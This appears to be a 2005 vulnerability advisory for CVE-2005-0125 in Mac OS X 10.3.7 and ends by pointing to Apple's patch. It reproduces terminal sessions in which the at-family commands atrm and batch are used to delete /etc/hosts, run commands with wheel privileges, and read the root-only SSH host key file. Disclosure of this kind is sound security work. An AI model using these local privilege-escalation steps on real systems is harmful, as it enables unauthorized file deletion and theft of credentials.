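Multiple Application Security Vulnerabilities in Apple OS X
Published: 2005-01-26
Updated: 2005-02-04
Affected systems:
Apple MacOS X Server 10.3.7
Apple MacOS X 10.3.7
Description:
BUGTRAQ ID: 12297
CVE(CAN) ID: CVE-2005-0125
Mac OS X is a BSD-based operating system.
Several of the at-related commands shipped with Mac OS X do not drop privileges correctly. A local attacker can exploit these flaws to delete files, run arbitrary commands, and read sensitive information.
'atrm' can be used to delete any file on the system: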
CrunkJuice:~ kevinfinisterre$ id
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre),
79(appserverusr), 80(admin), 81(appserveradm)
CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r-- root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts
CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory
'batch' can be used to execute arbitrary commands with the privileges gid=0(wheel) groups=0(wheel), 1(daemon),
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest):
CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test
CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory
(wait 5 minutes)
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)
'batch' can also be used to read any file on the system:
CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key
CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh
CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000
CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
<*Source: Kevin Finisterre (dotslash@snosoft.com)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2
*>
Recommendation:
Vendor patch:
Apple
-----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html